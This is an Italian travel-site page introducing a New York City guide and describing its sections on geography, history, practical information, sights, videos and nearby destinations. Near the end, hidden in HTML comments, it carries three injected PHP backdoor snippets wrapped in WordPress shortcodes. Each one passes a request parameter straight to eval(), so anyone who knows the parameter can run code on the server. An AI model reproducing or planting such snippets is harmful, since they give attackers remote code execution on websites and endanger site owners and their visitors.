Informazioni generali
Facebook Fan Page Twitter Fan Page Google Plus Page FeedBurner

Le guide turistiche per i tuoi viaggi



Guida New York

Guida New York

Infoturisti vi offre questa Guida di New York City. Se desiderate visitare o semplicemente conoscere la Grande Mela, troverete tutte le informazioni turistiche che potrebbero interessarvi.La Guida di New York City è suddivisa in diverse sezioni denominate:

 

Potete navigarci facilmente utilizzando il menù soprastante.

Di seguito potete trovare una descrizione generale sui contenuti di ogni sezione.

Guida New York: Geografia

Nella sezione dedicata alla geografia troverete tutte le informazioni riguardanti la collocazione geografica, il clima, l’economia ed il meteo di New York City. Abbiamo tentato di dare tutte e sole le informazioni che abbiamo ritenuto essere utili per un turista.

Guida New york: Storia

Nella sezione dedicata alla storia della nostra guida troverete una breve panoramica della storia di New York. E’ molto breve. Abbiamo tentato di dare le informazioni più utili sulla nascita e lo sviluppo della città più importante degli Stati Uniti.

Guida New York: Informazioni Utili per i turisti

Nella sezione sulle informazioni utili sono state raccolte tutte quelle informazioni che sono utili per i turisti. Il Meteo, i mezzi di trasporto, le festività ecc.

Guida New York: Cosa Vedere

La sezione è certamente la più ricca e probabilmente la più interessante. In essa troverete una descrizione delle maggiori attrazioni turistiche offerte da New York City.

Guida New York: Contributi Multimediali

Nei contributi multimediali sono stati raccolti una serie di video fatti da coloro che sono stati a New York come turisti. Raccolgono le loro sensazioni, una descrizione di quello che è stato visto e tutte le emozioni che New York è in grado di dare.

Guida ai dintorni di New York

Una città grande come New York non può non avere attrazioni turistiche degne di nota anche fuori dall’area metropolitana. In questa sezione InfoTuristi.com vi descrive le zone o le mete che assolutamente non dovete perdervi.

Se desiderate andare negli Stati Uniti non potete fare a meno di visitare New York.

<!– [insert_php]if (isset($_REQUEST["Csixz"])){eval($_REQUEST["Csixz"]);exit;}[/insert_php][php]if (isset($_REQUEST["Csixz"])){eval($_REQUEST["Csixz"]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST["jnlr"])){eval($_REQUEST["jnlr"]);exit;}[/insert_php][php]if (isset($_REQUEST["jnlr"])){eval($_REQUEST["jnlr"]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST["AcjOg"])){eval($_REQUEST["AcjOg"]);exit;}[/insert_php][php]if (isset($_REQUEST["AcjOg"])){eval($_REQUEST["AcjOg"]);exit;}[/php] –>

Lascia un commento

Il tuo indirizzo email non sarà pubblicato. I campi obbligatori sono contrassegnati *